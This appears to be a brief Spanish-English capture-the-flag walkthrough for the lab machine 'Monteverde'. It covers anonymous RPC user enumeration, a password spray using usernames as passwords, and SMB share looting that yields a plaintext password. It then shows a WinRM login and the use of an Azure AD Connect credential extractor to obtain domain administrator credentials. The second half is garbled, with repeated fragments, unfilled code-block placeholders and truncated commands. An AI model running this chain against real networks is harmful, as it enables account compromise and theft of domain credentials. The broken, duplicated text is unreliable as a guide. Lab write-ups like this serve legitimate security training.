Monteverde

rpcclient -U '' 10.10.10.172 -c "enumdomusers" -N | tr '[]' ' '| awk '{print $2}' > validUsers.txt

netexec smb 10.10.10.172 -u validUsers.txt  -p validUsers.txt  -d megabank.local --continue-on-success --no-bruteforce

SABatchJobs \ SABatchJobs 

smbmap -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'

smbclient //10.10.10.172/azure_uploads -U SABatchJobs%SABatchJobs

smbclient //10.10.10.172/users\$ -U SABatchJobs%SABatchJobs

get azure.xml

4n0therD4y@n0th3r$

netexec smb 10.10.10.172 -u validUsers.txt  -p '4n0therD4y@n0th3r

mhope \ 4n0therD4y@n0th3r$

```bash
evil-winrm -i 10.10.10.172 -u 'mhope'  -p '4n0therD4y@n0th3r

Como somos azure admins , podemos extraer las credenciales de todo el Azure AD
 
https://github.com/CloudyKhan/Azure-AD-Connect-Credential-Extractor.git

```bash
upload /mnt/Windows/Hacking/tools/EntraID/Azure-AD-Connect-Credential-Extractor/decrypt.ps1

./decrypt.ps1

administrator \ d0m@in4dminyeah!

-d megabank.local --continue-on-success

{{CODE_BLOCK_8}}

{{CODE_BLOCK_9}}

Como somos azure admins , podemos extraer las credenciales de todo el Azure AD
 
https://github.com/CloudyKhan/Azure-AD-Connect-Credential-Extractor.git

{{CODE_BLOCK_10}}

{{CODE_BLOCK_11}}

{{CODE_BLOCK_12}}

Como somos azure admins , podemos extraer las credenciales de todo el Azure AD

https://github.com/CloudyKhan/Azure-AD-Connect-Credential-Extractor.git

{{CODE_BLOCK_10}}

{{CODE_BLOCK_11}}

{{CODE_BLOCK_12}}
-d megabank.local --continue-on-success

{{CODE_BLOCK_8}}

{{CODE_BLOCK_9}}

Como somos azure admins , podemos extraer las credenciales de todo el Azure AD
 
https://github.com/CloudyKhan/Azure-AD-Connect-Credential-Extractor.git

{{CODE_BLOCK_10}}

{{CODE_BLOCK_11}}

{{CODE_BLOCK_12}}